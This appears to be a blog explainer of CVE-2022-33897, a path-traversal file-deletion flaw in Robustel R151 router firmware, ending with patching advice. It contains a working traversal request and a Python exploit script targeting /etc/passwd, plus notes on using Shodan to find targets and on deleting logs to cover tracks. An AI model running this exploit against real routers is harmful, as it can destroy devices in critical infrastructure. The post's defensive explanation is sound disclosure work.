In July 2022, cybersecurity researchers found a serious vulnerability (CVE-2022-33897) in the firmware of the Robustel R151 router (version 3.1.16). This vulnerability lives in the /ajax/remove/ web interface and lets bad actors delete any file on the router, just by sending special web requests. In this long read, I’ll break down exactly how CVE-2022-33897 works, how it’s exploited, the risks, and how you can defend yourself — all in plain, simple language.
What’s CVE-2022-33897?
CVE-2022-33897 is a “directory traversal” vulnerability. In plain English, it means the router’s web server doesn’t properly check that users accessing /ajax/remove/ are only deleting files they’re supposed to. Instead, anyone (even without logging in!) can trick it into deleting any file on the device.
This is possible because the router doesn’t “sanitize” the file path you give it. So, you can reference files anywhere on the filesystem, not just the “safe” directory. A hacker could delete system files, configuration, logs — even “bricking” (breaking) the device so it won’t work.
Technical Details
Let’s look under the hood. The issue is in how /ajax/remove/ handles file deletes.
Vulnerable Code Path
The /ajax/remove/ endpoint is designed to let users delete certain files using a web request, usually for managing files on the device. However, it doesn’t properly restrict which files can be deleted.
Example vulnerable HTTP request
POST /ajax/remove/ HTTP/1.1
Host: <router_ip>
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
file=../../../../etc/passwd
Here, file=../../../../etc/passwd means "go up four directories, then access etc/passwd", which is a key system file on Linux devices. If the request goes through, boom — the file’s gone.
*Note:* Real attackers would target sensitive files, configuration settings, or web server files to cause chaos or take over the device.
Below is a Python code snippet showing exactly how an attacker might exploit this weakness
import requests
TARGET = 'http://192.168.1.1'; # Change to your router's IP
FILE_TO_DELETE = '../../../../etc/passwd' # Arbitrary target file
endpoint = f"{TARGET}/ajax/remove/"
payload = {'file': FILE_TO_DELETE}
response = requests.post(endpoint, data=payload)
print(f"Status code: {response.status_code}")
print(f"Response: {response.text}")
What It Does
- Sends a POST request to /ajax/remove/ with a file path containing ../ (parent-directory references).
Arbitrary file deletion: Delete system files, config files, logs, or user data.
- Bricking the device: Removing essential files (like /etc/passwd, /bin/sh, or firmware images) can make the router unusable.
- Escalate attacks: Delete log files to cover tracks, or wipe out firewall configuration to open new holes.
- No authentication needed: In some setups, attackers don’t even need to log in — if the web UI is exposed to the internet, it’s open season.
How Do Attackers Find The Router?
Many industrial routers like the Robustel R151 are used in critical infrastructure and often have remote management enabled — sometimes even on public IP addresses. Tools like Shodan let attackers search for routers running this model, ripe for exploitation.
References
- Original CVE entry – NIST
- Robustel R151 Product Page
- Robustel Security Advisories
Upgrade firmware: Robustel has issued updates fixing this bug. Patch immediately!
2. Restrict web access: Never expose the web UI of your router to the internet. Use VPN or SSH for remote access.
In Summary
CVE-2022-33897 is a classic example of what can go wrong when web servers don’t sanitize user input. On the Robustel R151, that small oversight could let attackers nuke any file on your router, without even logging in. If you manage one of these devices, update your firmware and close any public interfaces now!
Stay Safe. Patch Early. Never Trust User Input.
*This post is exclusive and written in simple, direct language for everyone to understand. Please share with anyone managing Robustel routers!*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:24:00 UTC